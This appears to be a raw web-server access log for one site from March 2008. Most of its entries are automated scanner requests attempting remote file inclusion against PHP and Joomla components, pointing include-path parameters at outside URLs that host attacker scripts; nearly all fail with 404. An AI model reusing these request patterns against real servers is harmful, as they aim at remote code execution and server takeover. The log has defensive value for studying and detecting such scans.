207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /?D=A HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /?M=A HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:27 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:28 -0800] "GET /?N=A HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /?D=D HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /?M=D HTTP/1.0" 200 3078 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:29 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:30 -0800] "GET /plans/?N=A HTTP/1.0" 200 1095 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
207.44.154.126 - - [04/Mar/2008:06:49:31 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:49:49 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:49:49 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:49:49 -0800] "GET /logs/access_080201.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:06:49:52 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.60.191 - - [04/Mar/2008:06:50:24 -0800] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:50:34 -0800] "GET /logs/access_080211.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:06:50:46 -0800] "GET /logs/access_080208.log/index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:50:48 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:50:48 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:50:49 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:06:50:50 -0800] "GET /index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:06:50:53 -0800] "GET /logs/index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:06:52:30 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:52:45 -0800] "GET /logs/access.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:52:45 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:52:45 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:52:49 -0800] "GET /logs/access_080117.log/index.php?task=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:52:51 -0800] "GET /index.php?task=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:52:52 -0800] "GET /logs/index.php?task=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.17 - - [04/Mar/2008:06:53:24 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:54:27 -0800] "GET /logs/access_080207.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:06:54:32 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:55:03 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:55:22 -0800] "GET /logs/access_080211.log/index.php?task=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:55:29 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:55:29 -0800] "GET //skin/zero_vote/error.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:55:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:55:43 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:55:43 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.130.81.111 - - [04/Mar/2008:06:55:43 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:06:57:15 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:58:02 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:06:58:12 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:06:58:14 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:06:58:20 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:58:48 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:58:48 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:06:58:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.161.97.124 - - [04/Mar/2008:06:58:54 -0800] "GET /logs/access_080120.log/config.php?path_to_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:59:07 -0800] "GET /logs/access_080208.log//index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:59:08 -0800] "GET //index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:06:59:08 -0800] "GET /logs//index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:59:19 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:59:20 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:06:59:22 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.213 - - [04/Mar/2008:07:00:05 -0800] "GET /?path[docroot]=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:00:17 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:00:17 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:07:00:54 -0800] "GET /logs/admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:07:00:54 -0800] "GET /admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:00:55 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:07:00:56 -0800] "GET /logs/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:01:56 -0800] "GET /logs/access_080215.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:01:57 -0800] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:01:59 -0800] "GET /?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:02:00 -0800] "GET /logs/?phpbb_root_path=http://suwung.890m.com/test.txt??? HTTP/1.1" 200 37260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:06 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:06 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:06 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:06 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:08 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:15 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:15 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:03:15 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:03:46 -0800] "GET /logs/@scanhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:03:47 -0800] "GET /@scanhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:03:49 -0800] "GET /logs/access_080117.log//index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:03:51 -0800] "GET //index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.213.119 - - [04/Mar/2008:07:03:52 -0800] "GET /logs//index.php?s=http://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:07:04:02 -0800] "GET /@scanhttp://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:07:04:02 -0800] "GET /logs/@scanhttp://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:04:31 -0800] "GET /logs/access_080131.log//index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:04:31 -0800] "GET //index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [04/Mar/2008:07:04:31 -0800] "GET /logs//index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:05:27 -0800] "GET /index2.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.65.34.76 - - [04/Mar/2008:07:05:27 -0800] "GET /logs/index2.php??phpbb_root_path=%20phpbbhttp://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:05:32 -0800] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:05:32 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.218.149.119 - - [04/Mar/2008:07:05:50 -0800] "GET /logs/access_080103.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:06:05 -0800] "GET /logs/access_080131.log//index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:06:05 -0800] "GET //index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [04/Mar/2008:07:06:05 -0800] "GET /logs//index.php?s=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:06:13 -0800] "GET /logs//admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:06:13 -0800] "GET //admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:06:47 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.1.1 - - [04/Mar/2008:07:07:03 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.1.1 - - [04/Mar/2008:07:07:04 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.13.1.1 - - [04/Mar/2008:07:07:04 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:07:07:12 -0800] "GET /logs/access.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:07:22 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:07:22 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:07:22 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:07:07:23 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:07:07:23 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:07:07:38 -0800] "GET /logs/access_080208.log/index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:07:07:42 -0800] "GET /index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.155.86.251 - - [04/Mar/2008:07:07:45 -0800] "GET /logs/index.php?body=http://www.chyna.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.13.1.1 - - [04/Mar/2008:07:07:46 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:07:53 -0800] "GET /@scanhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:07:53 -0800] "GET /logs/@scanhttp://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.17.1.143 - - [04/Mar/2008:07:08:00 -0800] "GET /logs/@scanhttp://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
